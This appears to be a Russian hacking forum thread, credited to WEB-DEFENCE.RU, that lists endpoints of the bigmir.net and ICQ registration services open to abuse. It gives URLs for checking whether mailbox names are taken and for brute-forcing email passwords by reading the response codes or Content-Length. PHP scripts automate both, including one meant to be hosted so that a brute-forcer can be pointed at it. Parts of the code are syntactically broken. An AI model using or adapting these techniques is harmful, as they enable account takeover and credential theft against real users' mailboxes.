#1 Bag name: regisration mail (no pic) http://coregs.bigmir.net/?connectorId=_icqFlashConnector&eStage=1&uin=0&key=05CD194AA8D3C6158478A5C8E7BF1692C5386EE725079A14670F16CC647A70B1F8A9C9FC715DF466D6DD3555E3ED483227C27752F445C9C40BE6C013D88143934F6E87F782F3C5BF0DACCD365CD4FBB96B194553955EDED603ED920667DA0516&pass=521338&fname=&lname=&s=0&nick=&quest_str=%CD%EE%EC%E5%F0%20%EF%E0%F1%EF%EE%F0%F2%E0&answer=678345&day=0&month=0&year=0&country=380&city=10101&login=hghjjhgfhhg Login: hghjhg Passwd: 521338 #2 Bag name: Check mail in valid (speed) http://passport.bigmir.net/js/free.js?0::login=gdfgfdgdf Login: gdfgfdgdf если ответ true то значит мыло свободное #3 Bag name: Brut mail ( speed and ecomon traffic) http://www.icq.com/xtraz/products/coreg/Cactus/php/checkLspDetails.php?distid=10100&ver=2052&[email protected]&password=521338 Mail: [email protected] Passwd: 521338 если ответ времери 1 то значит пароль верный, если 2 то пасс неверный #4 Bag name: Brut mail 2 (high speed) http://coreg.bigmir.net/?uin=0&r_type=2&[email protected]&pass=stassats&subm=1 Mail: [email protected] Passwd: stassats В ответе хедера Content-Length: можна написать скоросной брут мыл если розмер больше 2000 то пароль правельный, соотвецтвенно если меньше то пароль неправльный Found by WEB-DEFENCE.RU
Немного оптимизировал процесс. для бага #2( Bag name: Check mail in valid (speed)) PHP: <? echo "<pre>\n"; @set_time_limit(0); @ini_set("display_errors","0"); $hostname = gethostbyname('passport.bigmir.net'); function login($login) { global $hostname; $responce = ""; $fsock = fsockopen($hostname,80,$errnum,$errstr,2); $headers = "GET http://passport.bigmir.net/js/free.js?0::login=$login HTTP/1.1\n"; $headers .= "Host: passport.bigmir.net\n"; $headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n"; $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; $headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n"; $headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n"; $headers .= "Keep-Alive: 500\n"; $headers .= "Connection: close\n"; $headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; fwrite ($fsock,$headers); while (!feof($fsock)) $responce .= fread($fsock,1024); fclose ($fsock); if(preg_match($responce, $rez)) echo $rez[1]; else echo 'Something not right...'; //echo $responce; } login("gdfgfdgdf"); echo "</pre>"; ?> Code by WEB-DEFENCE.RU
*Demo версия скрипта для перебора паролей через баг №3. - Устанавливаем скрипт на север. - берём любой брутфорсер травим на скрипт. PHP: <? //Web-DEFENCe.rU $name=''; $pass=''; $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) exit("<b>Access Denied</b>"); } } global $hostname; $responce = ""; $fsock = fsockopen($hostname,80,$errnum,$errstr,2); $headers = "GET http://www.icq.com/xtraz/products/coreg/Cactus/php/checkLspDetails.php?distid=10100&ver=2052&username=$name@bigmir.net&password=$pass HTTP/1.1\n"; $headers .= "Host: passport.bigmir.net \n"; $headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n"; $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; $headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n"; $headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n"; $headers .= "Keep-Alive: 500\n"; $headers .= "Connection: close\n"; fwrite ($fsock,$headers); while (!feof($fsock)) $responce .= fread($fsock,1024); fclose ($fsock); if(preg_match($responce, $rez)) echo $rez[1]; } ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <title>Верный пасс.</title> <style type="text/css"> <style type="text/css" media="all"> <? echo ($name:$pass); ?> Code by WEB-DEFENCE.RU
_https://coregs.bigmir.net/?utf8=yes&connectorId=_icqFlashConnector&connectorId=_icqFlashConnector&eStage=1&uin=475456491&key=8AE2D84F5AC8C414B11A73672505266B9693A34372FE5C770685D1D4DF67726D72EB27E3D72999AF6629070B2CAB84FA806CF20C7EB3420043509E1DC0DDA0603E0C806318D201598EE0F005506A5A7BD8EE4AF2AD0E5B25EC65EB7B4A3458ED&pass=521339&fname=&lname=&s=0&nick=&quest_str=?%92?%B0N??%B5%20?%BBNZ?%B1???????%B5%20N%87??N??%BB???&quest_str=?%92?%B0N??%B5%20?%BBNZ?%B1???????%B5%20N%87??N??%BB???&answer=ffffgdf&day=0&month=0&year=0&country=380&city=10101&login=hjfjttffgghktf если пароль подходит к асе то рега "ок" если нет то ошибка под номером 5.
Nightmarе, разбери ссылку на логические куски. Заполни свои логин пасс в нужных местах. Если заполнено верно вернёт "ок". Если не верно то пустую страницу.
